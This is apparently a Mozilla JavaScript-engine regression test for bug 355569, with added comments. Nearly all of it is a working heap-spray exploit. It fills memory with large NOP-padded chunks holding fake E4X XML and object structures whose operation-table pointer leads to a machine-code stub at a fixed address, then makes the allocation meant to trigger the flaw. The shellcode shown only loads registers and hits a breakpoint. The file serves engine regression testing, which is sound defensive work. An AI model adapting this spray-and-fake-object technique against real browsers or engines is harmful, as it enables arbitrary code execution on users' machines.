      1 /* -*- indent-tabs-mode: nil; js-indent-level: 4 -*- */
      2 
      3 /* This Source Code Form is subject to the terms of the Mozilla Public
      4 * License, v. 2.0. If a copy of the MPL was not distributed with this
      5 * file, You can obtain one at http://mozilla.org/MPL/2.0/. */
      6 
var BUGNUMBER = 355569;  // Bugzilla bug this regression test covers
var actual = '';         // never changed below: the test has no computed result
var expect = '';         // equal to `actual`, so reportCompare at the end passes
                         // unless the engine dies before reaching it (presumably)
var summary = '';        // no summary text was given for this test

printBugNumber (BUGNUMBER);
printStatus (summary);
     14 
/*
 * Fixed parameters the test feeds to sprayData()/makeExploitData().
 * They stay `var` globals because exploit() reads them by name.
 *   chunkSize     - code units * 2 per chunk string (16 MiB)
 *   chunkCount    - number of chunk strings kept in the rooter object
 *   chunkMarker   - 32-bit value packed at the front of every chunk
 *   chunkAlign    - padding granularity (bytes) applied before repetition
 *   reservedSize  - bytes left off the end of each chunk
 */
var targetAddress = 0x12030010;
var sprayParams = {
  chunkSize: 1 << 24,  // same value as 16 * 1024 * 1024
  chunkCount: 16,
  chunkMarker: 0xdeadface,
  chunkAlign: 0x1000,
  reservedSize: 1024
};
     23 
/**
 * Fixed six-code-unit payload placed at the "exploit-code" label by
 * makeExploitData(). Takes no parameters; any argument passed is ignored.
 * @returns {string} the constant payload string
 */
function makeExploitCode() {
  /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
  var payload = "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
  return payload;
}
     28 
     29 /*==========================================================================*/
     30 /*==========================================================================*/
     31 
/**
 * Pack numeric values into a string of UTF-16 code units.
 *
 * Each character of `template` selects how the next element of `A` is
 * emitted: "s"/"S" emit one 16-bit unit (low half of the value), "l"/"L"
 * emit two units with the low half first (the original author marked this
 * "XXX endian"), and "=" appends String(value). Any other template
 * character (for example a space used for grouping) emits nothing and
 * consumes no value.
 *
 * @param {string} template - format characters as described above
 * @param {ArrayLike<number>} A - values consumed left to right; a missing
 *   entry packs as 0 because `undefined >>> 0 === 0`
 * @returns {string} the packed code units
 */
function packData(template, A) {
  var out = "";
  var next = 0;
  for (var pos = 0; pos < template.length; pos++) {
    var word;
    switch (template.charAt(pos)) {
      case "s":
      case "S":
        word = A[next++] >>> 0;
        out += String.fromCharCode(word & 0xffff);
        break;
      case "l":
      case "L":
        word = A[next++] >>> 0;
        // High half via >>> 16: fromCharCode reduces to 16 bits either way.
        out += String.fromCharCode(word & 0xffff, word >>> 16);
        break;
      case "=":
        out += String(A[next++]);
        break;
      default:
        break;
    }
  }
  return out;
}
/**
 * Run a layout callback twice to produce a string with label addresses resolved.
 *
 * The callback receives a context with two methods:
 *   append(k, v) - records the byte offset (code units * 2) of label `k` at the
 *                  current end of the buffer, then appends `v`;
 *   address(k)   - returns `address` plus the recorded offset of `k`, or plain
 *                  `address` when `k` is missing or not yet recorded.
 * The first pass only fills in the offsets (forward references resolve to the
 * base); the buffer is then cleared and the second pass, with every offset
 * known, produces the returned string.
 *
 * @param {function(Object): void} worker - layout callback, called twice
 * @param {number} address - base address that label addresses are relative to
 * @returns {string} the buffer built by the second pass
 */
function buildStructure(worker, address) {
  var offsets = {};
  var buffer = "";
  var context = {
    append: function (key, chunk) {
      offsets[key] = buffer.length * 2;
      buffer += chunk;
    },
    address: function (key) {
      var offset = key ? offsets[key] : undefined;
      return address + (offset || 0);
    }
  };
  worker(context);      // pass 1: learn offsets
  buffer = "";
  worker(context);      // pass 2: emit with offsets known
  return buffer;
}
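/**
 * Return exactly `L` UTF-16 code units made by cycling `s`.
 *
 * @param {string} s - pattern to repeat (not mutated)
 * @param {number} L - desired length in code units
 * @returns {string} `s` truncated to `L` when it is already long enough
 *   (so `L <= 0` yields ""); otherwise `s` repeated and cut to `L`.
 *   An empty `s` yields "" because repeating it can never reach `L`.
 */
function repeatToLength(s, L) {
  if (L <= s.length) {
    return s.substring(0, L);
  }
  // Guard: the doubling loop below would never terminate on "" since its
  // length never grows.
  if (s.length === 0) {
    return "";
  }
  // Double until one more doubling would overshoot, then top up with a prefix.
  var buf = s;
  while (buf.length <= L / 2) {
    buf += buf;
  }
  return buf + buf.substring(0, L - buf.length);
}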
/**
 * Fill `rooter` with `params.chunkCount` large strings derived from `data`.
 *
 * `data` is first padded with 0x9090 code units up to chunkAlign/2 units,
 * then cycled out to (chunkSize - reservedSize)/2 units. Each entry is the
 * packed 32-bit chunkMarker, the filled chunk, and the entry index appended
 * as text (presumably so that no two entries are the same string).
 * The caller keeps `rooter` reachable; its name suggests it exists to keep
 * the strings alive, but that is an inference from the name.
 *
 * @param {string} data - seed content for every chunk
 * @param {{chunkSize:number, chunkCount:number, chunkMarker:number,
 *          chunkAlign:number, reservedSize:number}} params - see sprayParams
 * @param {Object} rooter - receives keys 0 .. chunkCount-1
 */
function sprayData(data, params, rooter) {
  var marker = packData("L", [params.chunkMarker]);
  var padding = repeatToLength("\u9090", params.chunkAlign / 2 - data.length);
  var chunk = repeatToLength(data + padding, (params.chunkSize - params.reservedSize) / 2);
  for (var index = 0; index < params.chunkCount; index++) {
    rooter[index] = marker + chunk + index;
  }
}
     65 
/**
 * Pack the two 32-bit fields of a legacy JSObject image, in parameter order.
 * @returns {string} four UTF-16 code units
 */
function T_JSObject(map, slots) {
  return packData("LL", [map, slots]);
}
/**
 * Pack the four 32-bit fields of a legacy JSObjectMap image, in parameter order.
 * @returns {string} eight UTF-16 code units
 */
function T_JSObjectMap(nrefs, ops, nslots, freeslot) {
  return packData("LLLL", [nrefs, ops, nslots, freeslot]);
}
/**
 * Pack the twenty-four 32-bit fields of a legacy JSObjectOps image, in
 * parameter order. The spaces in the template only group the fields and
 * emit nothing (see packData).
 * @returns {string} forty-eight UTF-16 code units
 */
function T_JSObjectOps(
  newObjectMap, destroyObjectMap, lookupProperty, defineProperty,
  getProperty, setProperty, getAttributes, setAttributes,
  deleteProperty, defaultValue, enumerate, checkAccess,
  thisObject, dropProperty, call, construct,
  xdrObject, hasInstance, setProto, setParent,
  mark, clear, getRequiredSlot, setRequiredSlot
) {
  var fields = [
    newObjectMap, destroyObjectMap, lookupProperty, defineProperty,
    getProperty, setProperty, getAttributes, setAttributes,
    deleteProperty, defaultValue, enumerate, checkAccess,
    thisObject, dropProperty, call, construct,
    xdrObject, hasInstance, setProto, setParent,
    mark, clear, getRequiredSlot, setRequiredSlot
  ];
  return packData("LLLLLLLL LLLLLLLL LLLLLLLL", fields);
}
     78 
/**
 * Pack a legacy JSXML list image, in parameter order. xml_class and
 * xml_flags are 16-bit ("S"); every other field is 32-bit ("L").
 * @returns {string} the packed code units
 */
function T_JSXML_LIST(
  object, domnode, parent, name, xml_class, xml_flags,
  kids_length, kids_capacity, kids_vector, kids_cursors,
  xml_target, xml_targetprop
) {
  var fields = [
    object, domnode, parent, name, xml_class, xml_flags,
    kids_length, kids_capacity, kids_vector, kids_cursors,
    xml_target, xml_targetprop
  ];
  return packData("LLLLSS LLLL LL", fields);
}
/**
 * Pack a legacy JSXML element image, in parameter order. xml_class and
 * xml_flags are 16-bit ("S"); every other field is 32-bit ("L").
 * @returns {string} the packed code units
 */
function T_JSXML_ELEMENT(
  object, domnode, parent, name, xml_class, xml_flags,
  kids_length, kids_capacity, kids_vector, kids_cursors,
  nses_length, nses_capacity, nses_vector, nses_cursors,
  atrs_length, atrs_capacity, atrs_vector, atrs_cursors
) {
  var fields = [
    object, domnode, parent, name, xml_class, xml_flags,
    kids_length, kids_capacity, kids_vector, kids_cursors,
    nses_length, nses_capacity, nses_vector, nses_cursors,
    atrs_length, atrs_capacity, atrs_vector, atrs_cursors
  ];
  return packData("LLLLSS LLLL LLLL LLLL", fields);
}
     90 
     91 /*==========================================================================*/
     92 /*==========================================================================*/
     93 
/**
 * Build the data string the test sprays: a chain of legacy structure images
 * whose pointer fields refer to one another by label. Labels are resolved
 * relative to `address` by buildStructure(); forward references (for
 * example "xml-kids-vector", used before it is appended) work because
 * buildStructure runs the layout twice.
 *
 * @param {number} address - base address the label addresses are relative to
 * @returns {string} the assembled string
 */
function makeExploitData(address) {
  var layout = function (ctx) {
    ctx.append("xml-list", T_JSXML_LIST(
      0, 0, 0, 0, 0, 0,
      1, 0, ctx.address("xml-kids-vector"), 0,
      0, 0));
    ctx.append("xml-kids-vector", packData("L", [ctx.address("xml-element")]));
    ctx.append("xml-element", T_JSXML_ELEMENT(
      ctx.address("object"), 0, 0, 0, 1, 0,
      0, 0, 0, 0,
      0, 0, 0, 0,
      0, 0, 0, 0));
    ctx.append("object", T_JSObject(ctx.address("object-map"), 0));
    ctx.append("object-map", T_JSObjectMap(0, ctx.address("object-ops"), 0, 0));
    ctx.append("object-ops", T_JSObjectOps(
      0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, 0, 0,
      0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0));
    ctx.append("exploit-code", makeExploitCode());
  };
  return buildStructure(layout, address);
}
    112 
/**
 * Body of the regression test: spray the assembled data, perform the
 * allocation under test, and report status.
 *
 * `this` is the global object here because the script is non-strict and
 * exploit() is called as a plain function, so the rooter object becomes a
 * global property and stays reachable for the rest of the run.
 */
function exploit() {
  var rooter = this.rooter = {};
  sprayData(makeExploitData(targetAddress), sprayParams, rooter);
  // Deliberately unused: the allocation itself is the step being exercised
  // (presumably the trigger for bug 355569).
  var numobj = new Number(targetAddress >> 1);
  printStatus("probably not exploitable");
}
    118 
try {
  exploit();
} catch (ignored) {
  // Intentionally swallowed: `expect` and `actual` are both '' above, so the
  // comparison below passes whenever the engine survives to reach it.
}

reportCompare(expect, actual);